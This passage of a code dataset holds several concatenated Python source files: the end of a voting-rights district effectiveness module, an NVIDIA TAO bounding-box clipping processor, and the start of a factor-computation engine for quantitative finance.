district] = black_pref_cand_dist\n hisp_pref_cands_prim_dist.at[\n hisp_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n if 'Runoff' in elec_set_dict[elec_set].keys():\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Runoff'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_cands_runoffs_dist.at[\n hisp_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Runoff'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_cands_runoffs_dist.at[\n black_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n\n black_pref_conf_single_dist = [prob_conf_conversion(x) for x in black_pref_prob_single_dist]\n black_conf_W3_dist = np.append(black_conf_W3_dist, np.array([black_pref_conf_single_dist]).transpose(), axis=1)\n\n hisp_pref_conf_single_dist = [prob_conf_conversion(x) for x in hisp_pref_prob_single_dist]\n hisp_conf_W3_dist = np.append(hisp_conf_W3_dist, np.array([hisp_pref_conf_single_dist]).transpose(), axis=1)\n\n neither_pref_conf_single_dist = [prob_conf_conversion(x * y) for x, y in\n zip(black_pref_prob_single_dist, hisp_pref_prob_single_dist)]\n neither_conf_W3_dist = np.append(neither_conf_W3_dist, np.array([neither_pref_conf_single_dist]).transpose(),\n axis=1)\n\n # compute W2 (\"in-group\"-minority-preference weight)\n min_cand_black_W2_dist, min_cand_hisp_W2_dist, min_cand_neither_W2_dist = compute_W2(elec_sets, \\\n dist_changes,\n min_cand_weights_dict,\n black_pref_cands_prim_dist,\n hisp_pref_cands_prim_dist,\n cand_race_dict)\n ################################################################################ \n # compute final election weights per district\n recency_W1 = recency_W1.copy()[:, dist_changes]\n black_weight_dist = recency_W1 * min_cand_black_W2_dist * black_conf_W3_dist\n hisp_weight_dist = recency_W1 * min_cand_hisp_W2_dist * hisp_conf_W3_dist\n neither_weight_dist = recency_W1 * min_cand_neither_W2_dist * neither_conf_W3_dist\n\n return black_weight_dist, hisp_weight_dist, neither_weight_dist, black_pref_cands_prim_dist, \\\n black_pref_cands_runoffs_dist, hisp_pref_cands_prim_dist, hisp_pref_cands_runoffs_dist\n\n\ndef prob_conf_conversion(cand_prob):\n # parameters chosen to be ~0 confidence until 50% then rapid ascension to confidence ~ 1\n cand_conf = 1 / (1 + np.exp(18 - 26 * cand_prob))\n return cand_conf\n\n\ndef compute_final_dist(map_winners, black_pref_cands_df, black_pref_cands_runoffs, \\\n hisp_pref_cands_df, hisp_pref_cands_runoffs, neither_weight_array, \\\n black_weight_array, hisp_weight_array, dist_elec_results, dist_changes,\n cand_race_table, num_districts, candidates, \\\n elec_sets, elec_set_dict, mode, partition, logit_params, logit=False):\n \"\"\"\n Returns (Latino, Black, Neither, Overlap) effectiveness distribution for each district. \n The four values sum to one. 
State-specific rules governing what counts as a \"win\" for \n an election set are coded here (for example, rules about advancing to runoff elections etc.).\n \"\"\"\n general_winners = map_winners[map_winners[\"Election Type\"] == 'General'].reset_index(drop=True)\n primary_winners = map_winners[map_winners[\"Election Type\"] == 'Primary'].reset_index(drop=True)\n runoff_winners = map_winners[map_winners[\"Election Type\"] == 'Runoff'].reset_index(drop=True)\n\n black_pref_wins = np.empty((len(elec_sets), 0), float)\n hisp_pref_wins = np.empty((len(elec_sets), 0), float)\n\n primary_second_df = pd.DataFrame(columns=range(num_districts))\n primary_second_df[\"Election Set\"] = elec_sets\n\n prim_share_hpc = pd.DataFrame(columns=range(num_districts))\n prim_share_hpc[\"Election Set\"] = elec_sets\n prim_share_bpc = pd.DataFrame(columns=range(num_districts))\n prim_share_bpc[\"Election Set\"] = elec_sets\n party_gen_winner = pd.DataFrame(columns=range(num_districts))\n party_gen_winner[\"Election Set\"] = elec_sets\n\n primary_races = [elec_set_dict[elec_set][\"Primary\"] for elec_set in elec_sets]\n runoff_races = [None if 'Runoff' not in elec_set_dict[elec_set].keys() else elec_set_dict[elec_set][\"Runoff\"] for\n elec_set in elec_sets]\n cand_party_dict = cand_race_table.set_index(\"Candidates\").to_dict()[\"Party\"]\n\n for dist in dist_changes:\n black_pref_cands = list(black_pref_cands_df[dist])\n hisp_pref_cands = list(hisp_pref_cands_df[dist])\n\n primary_dict = primary_winners.set_index(\"Election Set\").to_dict()[dist]\n general_dict = general_winners.set_index(\"Election Set\").to_dict()[dist]\n runoffs_dict = runoff_winners.set_index(\"Election Set\").to_dict()[dist]\n primary_winner_list = [primary_dict[es] for es in elec_sets]\n general_winner_list = [general_dict[es] for es in elec_sets]\n runoff_winner_list = [\"N/A\" if es not in list(runoff_winners[\"Election Set\"]) \\\n else runoffs_dict[es] for es in elec_sets]\n\n primary_race_share_dict = {primary_race: dist_elec_results[primary_race][dist] for primary_race in\n primary_races}\n primary_ranking = {primary_race: {key: rank for rank, key in \\\n enumerate(sorted(primary_race_share_dict[primary_race], \\\n key=primary_race_share_dict[primary_race].get, reverse=True),\n 1)} \\\n for primary_race in primary_race_share_dict.keys()}\n\n second_place_primary = {primary_race: [cand for cand, value in primary_ranking[primary_race].items() \\\n if primary_ranking[primary_race][cand] == 2] for primary_race in\n primary_races}\n\n primary_second_df[dist] = [second_place_primary[key][0] for key in second_place_primary.keys()]\n\n black_pref_prim_rank = [primary_ranking[pr][bpc] for pr, bpc in zip(primary_races, black_pref_cands)]\n hisp_pref_prim_rank = [primary_ranking[pr][hpc] for pr, hpc in zip(primary_races, hisp_pref_cands)]\n\n prim_share_hpc[dist] = [primary_race_share_dict[prim_race][hpc] for prim_race, hpc in\n zip(primary_races, hisp_pref_cands)]\n prim_share_bpc[dist] = [primary_race_share_dict[prim_race][bpc] for prim_race, bpc in\n zip(primary_races, black_pref_cands)]\n party_general_winner = [cand_party_dict[gw] for gw in general_winner_list]\n party_gen_winner[dist] = party_general_winner\n\n # we always care who preferred candidate is in runoff if the minority preferred primary\n # candidate wins in district primary\n runoff_black_pref = [\"N/A\" if rw == \"N/A\" else \\\n bpc for rw, bpc in zip(runoff_winner_list, list(black_pref_cands_runoffs[dist]))]\n\n runoff_hisp_pref = [\"N/A\" if rw == \"N/A\" else \\\n hpc 
for rw, hpc in zip(runoff_winner_list, list(hisp_pref_cands_runoffs[dist]))]\n\n # winning conditions (conditions to accrue points for election set/minority group):\n black_accrue = [(prim_win == bpc and party_win == 'D') if run_race == None else \\\n ((bpp_rank < 3 and run_win == runbp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][bpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, bpc, party_win, bpp_rank, run_win, runbp, prim_race \\\n in zip(runoff_races, primary_winner_list, black_pref_cands, \\\n party_general_winner, black_pref_prim_rank, runoff_winner_list, \\\n runoff_black_pref, primary_races)]\n\n black_pref_wins = np.append(black_pref_wins, np.array([black_accrue]).transpose(), axis=1)\n\n hisp_accrue = [(prim_win == hpc and party_win == 'D') if run_race == None else \\\n ((hpp_rank < 3 and run_win == runhp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][hpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, hpc, party_win, hpp_rank, run_win, runhp, \\\n prim_race in zip(runoff_races, primary_winner_list, hisp_pref_cands, \\\n party_general_winner, hisp_pref_prim_rank, runoff_winner_list, \\\n runoff_hisp_pref, primary_races)]\n\n hisp_pref_wins = np.append(hisp_pref_wins, np.array([hisp_accrue]).transpose(), axis=1)\n\n neither_pref_wins = (1 - black_pref_wins) * (1 - hisp_pref_wins)\n\n if len(black_weight_array[0]) > 2:\n black_weight_array = black_weight_array[:, dist_changes]\n hisp_weight_array = hisp_weight_array[:, dist_changes]\n neither_weight_array = neither_weight_array[:, dist_changes]\n\n # election set weight's number of points are accrued if Black or Latino preferred candidate(s) win (or proxies do)\n neither_points_accrued = neither_weight_array * neither_pref_wins\n black_points_accrued = black_weight_array * black_pref_wins\n hisp_points_accrued = hisp_weight_array * hisp_pref_wins\n\n #####################################################################################\n # Compute district probabilities: Black, Latino, Neither and Overlap\n black_vra_elec_wins = list(np.sum(black_points_accrued, axis=0) / np.sum(black_weight_array, axis=0))\n black_gc = [min(1, (partition[\"BCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n black_vra_prob = [i * j for i, j in zip(black_vra_elec_wins, black_gc)]\n\n hisp_vra_elec_wins = list(np.sum(hisp_points_accrued, axis=0) / np.sum(hisp_weight_array, axis=0))\n hisp_gc = [min(1, (partition[\"HCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n hisp_vra_prob = [i * j for i, j in zip(hisp_vra_elec_wins, hisp_gc)]\n\n neither_vra_prob = list(np.sum(neither_points_accrued, axis=0) / np.sum(neither_weight_array, axis=0))\n\n # feed through logit:\n if logit == True:\n logit_coef_black = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'coef'].values[0]\n logit_intercept_black = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'intercept'].values[0]\n logit_coef_hisp = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'coef'].values[\n 0]\n logit_intercept_hisp = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'intercept'].values[0]\n logit_coef_neither = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'coef'].values[\n 0]\n logit_intercept_neither = logit_params.loc[\n 
(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'intercept'].values[0]\n\n black_vra_prob = [1 / (1 + np.exp(-(logit_coef_black * y + logit_intercept_black))) for y in black_vra_prob]\n hisp_vra_prob = [1 / (1 + np.exp(-(logit_coef_hisp * y + logit_intercept_hisp))) for y in hisp_vra_prob]\n neither_vra_prob = [1 / (1 + np.exp(-(logit_coef_neither * y + logit_intercept_neither))) for y in\n neither_vra_prob]\n\n min_neither = [0 if (black_vra_prob[i] + hisp_vra_prob[i]) > 1 else 1 - (black_vra_prob[i] + hisp_vra_prob[i]) for i\n in range(len(dist_changes))]\n max_neither = [1 - max(black_vra_prob[i], hisp_vra_prob[i]) for i in range(len(dist_changes))]\n\n # uses ven diagram overlap/neither method\n final_neither = [round(min_neither[i], 3) if neither_vra_prob[i] < min_neither[i] else round(max_neither[i], 3) \\\n if neither_vra_prob[i] > max_neither[i] else round(neither_vra_prob[i], 3) for i in range(len(dist_changes))]\n final_overlap = [round(final_neither[i] + black_vra_prob[i] + hisp_vra_prob[i] - 1, 3) for i in\n range(len(dist_changes))]\n final_black_prob = [round(black_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n final_hisp_prob = [round(hisp_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n\n # when fitting logit, comment in:\n # final_neither = neither_vra_prob\n # final_overlap = [\"N/A\"]*len(dist_changes)\n # final_black_prob = black_vra_prob #[black_vra_prob[i] - final_overlap[i] for i in range(len(dist_changes))]\n # final_hisp_prob = hisp_vra_prob\n\n return dict(zip(dist_changes, zip(final_hisp_prob, final_black_prob, final_neither, final_overlap)))\n\n\ndef compute_W2(elec_sets, districts, min_cand_weights_dict, black_pref_cands_df, hisp_pref_cands_df, \\\n cand_race_dict):\n \"\"\"\n Returns in-group preferred candidate election weight (W2). 
This weight is 1 if the Latino-preferred\n candidate is Latino, etc.\n \"\"\"\n\n min_cand_black_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_hisp_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_neither_W2 = np.empty((len(elec_sets), 0), float)\n\n for dist in districts:\n black_pref = list(black_pref_cands_df[dist])\n\n black_pref_race = [cand_race_dict[bp] for bp in black_pref]\n black_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Black\" in bpr else \\\n min_cand_weights_dict[\"Other\"] for bpr in black_pref_race]\n min_cand_black_W2 = np.append(min_cand_black_W2, np.array([black_cand_weight]).transpose(), axis=1)\n\n hisp_pref = list(hisp_pref_cands_df[dist])\n hisp_pref_race = [cand_race_dict[hp] for hp in hisp_pref]\n hisp_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Hispanic\" in hpr else \\\n min_cand_weights_dict[\"Other\"] for hpr in hisp_pref_race]\n min_cand_hisp_W2 = np.append(min_cand_hisp_W2, np.array([hisp_cand_weight]).transpose(), axis=1)\n\n neither_cand_weight = [min_cand_weights_dict['Relevant Minority'] if ('Hispanic' in hpr and 'Black' in bpr) else \\\n min_cand_weights_dict['Other'] if ('Hispanic' not in hpr and 'Black' not in bpr) else \\\n min_cand_weights_dict['Partial '] for bpr, hpr in\n zip(black_pref_race, hisp_pref_race)]\n min_cand_neither_W2 = np.append(min_cand_neither_W2, np.array([neither_cand_weight]).transpose(), axis=1)\n\n return min_cand_black_W2, min_cand_hisp_W2, min_cand_neither_W2\n\n\ndef cand_pref_all_draws_outcomes(prec_quant_df, precs, bases, outcomes, sample_size=1000):\n \"\"\"\n To aggregrate precinct EI to district EI for district model score\n \"\"\"\n quant_vals = np.array([0, 125, 250, 375, 500, 625, 750, 875, 1000])\n draws = {}\n for outcome in outcomes.keys():\n draw_base_list = []\n for base in outcomes[outcome]:\n dist_prec_quant = prec_quant_df.copy()\n vec_rand = np.random.rand(sample_size, len(dist_prec_quant))\n vec_rand_shift = np.array(dist_prec_quant[base + '.' + '0']) + sum(\n np.minimum(np.maximum(vec_rand - quant_vals[qv] / 1000, 0), .125) * 8 * np.array(\n dist_prec_quant[base + '.' + str(quant_vals[qv + 1])] - dist_prec_quant[\n base + '.' 
+ str(quant_vals[qv])]) for qv in range(len(quant_vals) - 1))\n draw_base_list.append(vec_rand_shift.astype('float32').T)\n draws[outcome] = np.transpose(np.stack(draw_base_list), (1, 0, 2))\n return draws\n\n\ndef cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes):\n dist_draws = {}\n for outcome in outcomes:\n summed_outcome = prec_draws_outcomes[outcome][dist_prec_indices].sum(axis=0)\n unique, counts = np.unique(np.argmax(summed_outcome, axis=0), return_counts=True)\n prefs = {x.split('.')[1].split('_counts')[0]: 0.0 for x in outcomes[outcome]}\n prefs_counts = dict(zip(unique, counts))\n prefs.update(\n {outcomes[outcome][key].split('.')[1].split('_counts')[0]: prefs_counts[key] / len(summed_outcome[0]) for\n key in prefs_counts.keys()})\n dist_draws[outcome] = prefs\n return dist_draws\n","repo_name":"scott-norris-math/GerryWrap","sub_path":"src/run_functions.py","file_name":"run_functions.py","file_ext":"py","file_size_in_byte":25903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20610523041","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_FIRST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_LAST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.processors.processor import (\n Processor,\n)\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import LABEL_OBJECT\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import SequenceExample\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import TransformedExample\nfrom nvidia_tao_tf1.core.coreobject import save_args\nfrom nvidia_tao_tf1.core.types import Example\n\n\nclass BboxClipper(Processor):\n \"\"\"Processor for adjusting bounding box labels after cropping.\n\n The following changes need to be made to bounding box labels:\n 1) Labels completely out of the network's input are discarded.\n 2) Labels that are 'half-in, half-out' should have their coordinates clipped to the input\n crop.\n 3) Labels from 2) also should have their ``truncation_type`` updated accordingly.\n \"\"\"\n\n @save_args\n def __init__(self, crop_left=0, crop_right=0, crop_top=0, crop_bottom=0):\n \"\"\"Constructor.\n\n If all of the provided crop coordinates are or 0, this processor will amount to a no-op.\n\n Args:\n crop_left (int): Left-most coordinate of the crop region.\n crop_right (int): Right-most coordinate of the crop region.\n crop_top (int): Top-most coordinate of the crop region.\n crop_bottom (int): Bottom-most coordinate of the crop region.\n\n Raises:\n ValueError: if crop_left > crop_right, or crop_top > crop_bottom.\n \"\"\"\n super(BboxClipper, self).__init__()\n self._no_op = False\n all_crop_coords = {crop_left, crop_right, crop_top, crop_bottom}\n if all_crop_coords == {0}:\n self._no_op = True\n\n if not self._no_op:\n if crop_left >= crop_right or crop_top >= crop_bottom:\n raise ValueError(\n \"Provided crop coordinates result in a non-sensical crop-region.\"\n )\n\n self._crop_left = float(crop_left)\n self._crop_right = float(crop_right)\n self._crop_bottom = float(crop_bottom)\n self._crop_top = float(crop_top)\n\n @property\n def supported_formats(self):\n \"\"\"Data formats supported by this processor.\n\n Returns:\n data_formats (list of 'DataFormat'): Input data formats that this processor supports.\n \"\"\"\n return 
[CHANNELS_FIRST, CHANNELS_LAST]\n\n def can_compose(self, other):\n \"\"\"\n Determine whether two processors can be composed into a single one.\n\n Args:\n other (Processor): Other processor instance.\n\n Returns:\n (bool): True if this processor knows how to compose the other processor.\n \"\"\"\n return False\n\n def compose(self, other):\n \"\"\"Compose two processors into a single one.\"\"\"\n raise NotImplementedError(\"BboxClipper.compose not supported.\")\n\n def _get_indices_inside_crop(self, coords):\n \"\"\"Get indices for bounding boxes that are at least partially inside the crop region.\n\n Args:\n coords (tf.Tensor): Float tensor of shape (N, 4) where N is the number of bounding\n boxes. Each bbox has coordinates in the order [L, T, R, B].\n\n Returns:\n valid_indices (tf.Tensor): Boolean tensor of shape (N,) indicating which bounding boxes\n in the input are at least partially inside the crop region.\n \"\"\"\n valid_indices = tf.ones(tf.shape(input=coords)[0], dtype=tf.bool)\n\n # False if left-most coordinate is to the right of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 0], self._crop_right)\n )\n # False if right-most coordinate is to the left of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 2], self._crop_left)\n )\n # False if top-most coordinate is to the bottom of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 1], self._crop_bottom)\n )\n # False if bottom-most coordinate is to the top of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 3], self._crop_top)\n )\n\n return valid_indices\n\n def _adjust_truncation_type(self, bbox_2d_label):\n \"\"\"Adjust the truncation_type of a label if it is half-in, half-out of the crop.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance for which we will update the\n truncation_type.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n if isinstance(bbox_2d_label.truncation_type, tf.SparseTensor):\n new_coords = bbox_2d_label.vertices.coordinates.values\n # Get LTRB.\n x1, y1, x2, y2 = (\n new_coords[::4],\n new_coords[1::4],\n new_coords[2::4],\n new_coords[3::4],\n )\n\n left_most_in = tf.logical_and(\n tf.greater_equal(x1, self._crop_left),\n tf.less_equal(x1, self._crop_right),\n )\n top_most_in = tf.logical_and(\n tf.greater_equal(y1, self._crop_top),\n tf.less_equal(y1, self._crop_bottom),\n )\n right_most_in = tf.logical_and(\n tf.greater_equal(x2, self._crop_left),\n tf.less_equal(x2, self._crop_right),\n )\n bottom_most_in = tf.logical_and(\n tf.greater_equal(y2, self._crop_top),\n tf.less_equal(y2, self._crop_bottom),\n )\n # Needs adjustment if top-left corner is inside and bottom-right corner is outside, or\n # vice versa.\n half_in_half_out = tf.math.logical_xor(\n tf.logical_and(left_most_in, top_most_in),\n tf.logical_and(right_most_in, bottom_most_in),\n )\n\n old_truncation_type = bbox_2d_label.truncation_type\n new_truncation_type_values = tf.cast(\n tf.logical_or(\n tf.cast(\n old_truncation_type.values, dtype=tf.bool\n ), # Why is this int32??\n half_in_half_out,\n ),\n dtype=tf.int32,\n )\n\n new_truncation_type = tf.SparseTensor(\n values=new_truncation_type_values,\n indices=old_truncation_type.indices,\n dense_shape=old_truncation_type.dense_shape,\n )\n\n return bbox_2d_label._replace(truncation_type=new_truncation_type)\n\n # This corresponds to the case where the `truncation_type` field is 
not present.\n return bbox_2d_label\n\n def _clip_to_crop_region(self, bbox_2d_label):\n \"\"\"Clip the coordinates to the crop region.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to clip.\n\n Returns:\n clipped_label (Bbox2DLabel): Clipped version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n xmin, ymin, xmax, ymax = (\n input_coords[::4],\n input_coords[1::4],\n input_coords[2::4],\n input_coords[3::4],\n )\n\n xmin = tf.clip_by_value(xmin, self._crop_left, self._crop_right)\n ymin = tf.clip_by_value(ymin, self._crop_top, self._crop_bottom)\n xmax = tf.clip_by_value(xmax, self._crop_left, self._crop_right)\n ymax = tf.clip_by_value(ymax, self._crop_top, self._crop_bottom)\n\n clipped_coords = tf.stack([xmin, ymin, xmax, ymax], axis=1)\n clipped_coords = tf.reshape(clipped_coords, [-1]) # Flatten.\n\n new_coords = tf.SparseTensor(\n values=clipped_coords,\n indices=bbox_2d_label.vertices.coordinates.indices,\n dense_shape=bbox_2d_label.vertices.coordinates.dense_shape,\n )\n new_vertices = bbox_2d_label.vertices._replace(coordinates=new_coords)\n\n return bbox_2d_label._replace(vertices=new_vertices)\n\n def _adjust_bbox_2d_label(self, bbox_2d_label):\n \"\"\"Apply adjustments due to cropping to bounding box labels.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to apply the adjustments to.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n # For convenience, reshape input coordinates.\n input_coords = tf.reshape(input_coords, [-1, 4]) # Order is L, T, R, B.\n\n # First, figure out which ones are completely outside the crop.\n valid_indices = self._get_indices_inside_crop(input_coords)\n\n adjusted_label = bbox_2d_label.filter(valid_indices)\n\n # Now, determine, which ones need to have their coordinates clipped and truncation_type\n # adjusted.\n adjusted_label = self._adjust_truncation_type(adjusted_label)\n adjusted_label = self._clip_to_crop_region(adjusted_label)\n\n return adjusted_label\n\n def process(self, example):\n \"\"\"\n Process an example.\n\n Args:\n example (Example): Example with frames in format specified by data_format.\n\n Returns:\n (Example): Processed example.\n\n Raises:\n ValueError: Since this processor explicitly needs to be applied after transformations\n (if they are present), it does not accept TransformedExample.\n \"\"\"\n if isinstance(example, TransformedExample):\n raise ValueError(\n \"BboxClipper should be applied on labels that have been transformed.\"\n )\n\n if not self._no_op:\n if isinstance(example, (Example, SequenceExample)):\n if LABEL_OBJECT in example.labels:\n example.labels[LABEL_OBJECT] = self._adjust_bbox_2d_label(\n bbox_2d_label=example.labels[LABEL_OBJECT]\n )\n\n return example\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/blocks/multi_source_loader/processors/bbox_clipper.py","file_name":"bbox_clipper.py","file_ext":"py","file_size_in_byte":10428,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"3891210019","text":"from typing import Union, Iterable, Tuple, Dict\nimport warnings\nfrom .factor import BaseFactor\nfrom .filter import FilterFactor, StaticAssets\nfrom .datafactor import ColumnDataFactor, AdjustedColumnDataFactor\nfrom ..plotting import plot_quantile_and_cumulative_returns, plot_chart\nfrom ..data import DataLoader\nfrom ..parallel import ParallelGroupBy\nimport 
pandas as pd\nimport numpy as np\nimport torch\n\n\nclass OHLCV:\n open = ColumnDataFactor(inputs=('',), should_delay=False)\n high = ColumnDataFactor(inputs=('',))\n low = ColumnDataFactor(inputs=('',))\n close = ColumnDataFactor(inputs=('',))\n volume = ColumnDataFactor(inputs=('',))\n\n\nclass FactorEngine:\n \"\"\"\n Engine for compute factors, used for back-testing and alpha-research both.\n \"\"\"\n\n # friend private:\n\n @property\n def dataframe_(self):\n return self._dataframe\n\n @property\n def loader_(self):\n return self._loader\n\n def get_group_(self, group_name):\n return self._groups[group_name]\n\n def column_to_tensor_(self, data_column) -> torch.Tensor:\n # cache data with column prevent double copying\n if data_column in self._column_cache:\n return self._column_cache[data_column]\n\n series = self._dataframe[data_column]\n data = torch.from_numpy(series.values).to(self._device, non_blocking=True)\n self._column_cache[data_column] = data\n return data\n\n def column_to_parallel_groupby_(self, group_column: str, as_group_name=None):\n if as_group_name is None:\n as_group_name = group_column\n if as_group_name in self._groups:\n return\n\n series = self._dataframe[group_column]\n if series.dtype.name == 'category':\n cat = series.cat.codes\n else:\n cat = series.values\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups[as_group_name] = ParallelGroupBy(keys)\n\n def revert_(self, data: torch.Tensor, group: str, factor_name: str) -> torch.Tensor:\n return self._groups[group].revert(data, factor_name)\n\n def revert_to_series_(self, data: torch.Tensor, group: str, factor_name: str) -> pd.Series:\n array = self.revert_(data, group, factor_name).cpu()\n return pd.Series(array, index=self._dataframe.index)\n\n def group_by_(self, data: Union[torch.Tensor, pd.Series], group: str) -> torch.Tensor:\n if isinstance(data, torch.Tensor):\n return self._groups[group].split(data)\n elif isinstance(data, pd.Series):\n data = torch.tensor(data.values, device=self._device)\n return self._groups[group].split(data)\n elif isinstance(data, np.ndarray):\n data = torch.tensor(data, device=self._device)\n return self._groups[group].split(data)\n else:\n raise ValueError('Invalid data type, should be tensor or series.')\n\n # private:\n\n def _prepare_tensor(self, start, end, max_backwards):\n # Check cache, just in case, if use some ML techniques, engine may be called repeatedly\n # with same date range.\n if start == self._last_load[0] and end == self._last_load[1] \\\n and max_backwards <= self._last_load[2]:\n return\n self._groups = dict()\n\n # Get data\n df = self._loader.load(start, end, max_backwards).copy()\n # If possible, pre-screen\n if isinstance(self._filter, StaticAssets):\n df = df.loc[(slice(None), self._filter.assets), :]\n if df.shape[0] == 0:\n raise ValueError(\"The assets {} specified by StaticAssets filter, was not found in \"\n \"DataLoader.\".format(self._filter.assets))\n # check history data is insufficient\n df.index = df.index.remove_unused_levels()\n history_win = df.index.levels[0].get_loc(start, 'bfill')\n if history_win < max_backwards:\n warnings.warn(\"Historical data seems insufficient. \"\n \"{} rows of historical data are required, but only {} rows are obtained. 
\"\n \"It is also possible that `calender_asset` of the loader is not set, \"\n \"some out of trading hours data will cause indexing problems.\"\n .format(max_backwards, history_win),\n RuntimeWarning)\n # post processing data\n if self._align_by_time:\n # since pandas 0.23, MultiIndex reindex is slow, so using a alternative way here,\n # but still very slow.\n # df = df.reindex(pd.MultiIndex.from_product(df.index.levels))\n df = df.unstack(level=1).stack(dropna=False)\n if self.timezone != 'UTC':\n df = df.reset_index('asset').tz_convert(self.timezone)\\\n .set_index(['asset'], append=True)\n\n self._dataframe = df\n self._dataframe_index = [df.index.get_level_values(i) for i in range(len(df.index.levels))]\n\n # asset group\n cat = self._dataframe_index[1].codes\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups['asset'] = ParallelGroupBy(keys)\n\n # time group prepare\n self.column_to_parallel_groupby_(self._loader.time_category, 'date')\n\n self._column_cache = {}\n if isinstance(self._filter, StaticAssets):\n # if pre-screened, don't cache data, only cache full data.\n self._last_load = [None, None, None]\n else:\n self._last_load = [start, end, max_backwards]\n\n def _compute_and_revert(self, f: BaseFactor, name) -> torch.Tensor:\n stream = None\n if self._device.type == 'cuda' and self._enable_stream:\n stream = torch.cuda.current_stream()\n data = f.compute_(stream)\n return self._groups[f.groupby].revert(data, name)\n\n # public:\n\n def __init__(self, loader: DataLoader) -> None:\n self._loader = loader\n self._dataframe = None\n self._dataframe_index = None\n self._groups = dict()\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._factors = {}\n self._filter = None\n self._device = torch.device('cpu')\n self._enable_stream = False\n self._align_by_time = False\n self.timezone = 'UTC'\n\n @property\n def device(self):\n return self._device\n\n @property\n def dataframe_index(self):\n return self._dataframe_index\n\n def create_tensor(self, group: str, dtype, values, nan_values) -> torch.Tensor:\n return self._groups[group].create(dtype, values, nan_values)\n\n @property\n def align_by_time(self):\n return self._align_by_time\n\n @align_by_time.setter\n def align_by_time(self, enable: bool):\n \"\"\"\n If `enable` is `True`, df index will be the product of 'date' and 'asset'.\n This method is slow, recommended to do it in your DataLoader in advance.\n \"\"\"\n self._align_by_time = enable\n\n def add(self,\n factor: Union[Iterable[BaseFactor], BaseFactor],\n name: Union[Iterable[str], str],\n replace=False) -> None:\n \"\"\"\n Add factor or filter to engine, as a column.\n \"\"\"\n if isinstance(factor, Iterable):\n for i, fct in enumerate(factor):\n self.add(fct, name and name[i] or None)\n else:\n if name in self._factors and not replace:\n raise KeyError('A factor with the name {} already exists.'\n 'please specify a new name by engine.add(factor, new_name)'\n .format(name))\n self._factors[name] = factor\n\n def set_filter(self, factor: Union[FilterFactor, None]) -> None:\n self._filter = factor\n\n def get_filter(self):\n return self._filter\n\n def get_factor(self, name):\n return self._factors[name]\n\n @property\n def factors(self):\n return self._factors.copy()\n\n def clear(self):\n self.remove_all_factors()\n self.set_filter(None)\n\n def empty_cache(self):\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._groups = dict()\n self._dataframe = None\n self._dataframe_index = None\n\n def 
